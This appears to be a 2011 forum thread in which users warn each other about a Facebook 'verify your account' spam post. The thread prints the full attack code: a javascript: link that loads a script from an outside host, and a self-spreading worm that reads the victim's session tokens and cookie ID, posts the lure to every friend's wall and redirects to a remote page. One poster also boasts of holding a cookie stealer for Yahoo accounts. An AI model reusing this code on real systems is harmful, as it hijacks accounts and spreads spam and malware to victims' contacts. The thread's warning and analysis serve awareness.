Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Another Facebook Scam/Spam
#1
This was posted to my Wall earlier today...

In order to PREVENT SPAM, I ask that you VERIFY YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to start the process...

The "verification" link is...

Code:
javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://plucketenhe.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();

First of all, I don't have protection on my browser right now so... not going to check that out. But the domain plucketenhe doesn't sound legit. So I wouldn't recommend clicking this.

Edit: At the moment, it appears that 3 people have posted to my wall from iPhones.
We all have things we want to say, but not publicly. We all need help with them at one point. If you want a private conversation or seek private help, send me a PM.
Reply
#2
Facebook spam these days are become quite meticulous. The link being next to that of the Like and Comment buttons make it even more believable.

Thanks for the heads up.
Reply
#3
Gets your friends and spamms their walls.... Looks like o.O

Code:
var message = "In order to PREVENT SPAM, I ask that you VERIFY YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to start the process...";
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://plucketenhe.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
var myText = "==>[VERIFY MY ACCOUNT]<==";

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
gf.send();
if(gf.readyState!=4){ }else{
    data = eval('(' + gf.responseText.substr(9) + ')');
    if(data.error){ }else{
        friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
    }
}
for(var i=0; i<friends.length; i++){
    var httpwp = new XMLHttpRequest();
    var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
    var paramswp = "&__d=1&app_id=6628568379&extern=0&" +
                   "&post_form_id=" + post_form_id +
                   "&fb_dtsg=" + fb_dtsg +
                   "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
                   "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
                   "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
                   "&user_message=" + message;
    httpwp.open("POST", urlwp, true);
    httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpwp.setRequestHeader("Content-length", paramswp.length);
    httpwp.setRequestHeader("Connection", "keep-alive");
    httpwp.onreadystatechange = function(){
        if (httpwp.readyState == 4 && httpwp.status == 200){
            
        }
    }
    httpwp.send(paramswp);
}
alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted.");
document.location = "http://qite.ws/gl2o1";
Reply
#4
What does this do?

alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted.");
document.location = "http://qite.ws/gl2o1";
We all have things we want to say, but not publicly. We all need help with them at one point. If you want a private conversation or seek private help, send me a PM.
Reply
#5
(05-11-2011, 11:53 PM)Veryx Wrote: What does this do?

alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted.");
document.location = "http://qite.ws/gl2o1";


It's a fake error, and redirect to the same page again, http: //plucketenhe.info but it didn't load....
Reply
#6
fb viral script
Reply
#7
Scripts like these are usually developed to steal cookies stored in your browser. I currently have one that steals cookies stored for yahoo and hence giving access to their account. I will analyze this script and edit this post and update you with my findings.
I hate sex in the movies. Tried it once, the seat folded up, the drink spilled and that ice,
well it really chilled her mood.

[Image: 506243.png]
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  All Spam Chief 13 1,942 10-27-2011, 08:57 AM
Last Post: Fragma
  Youtube Scam [LoL] iCrack 11 2,016 05-22-2011, 03:04 PM
Last Post: WhiteFlame
  Scam Fail: how stupid? Canoris 23 4,063 07-02-2010, 07:29 AM
Last Post: DanPaq
  SPAM TOPIC 11 1,572 06-12-2010, 04:41 AM
Last Post: Trinit
  Tired of the spam. Gone 5 1,474 04-10-2010, 04:10 PM
Last Post: Tank

Forum Jump:


Users browsing this thread: 2 Guest(s)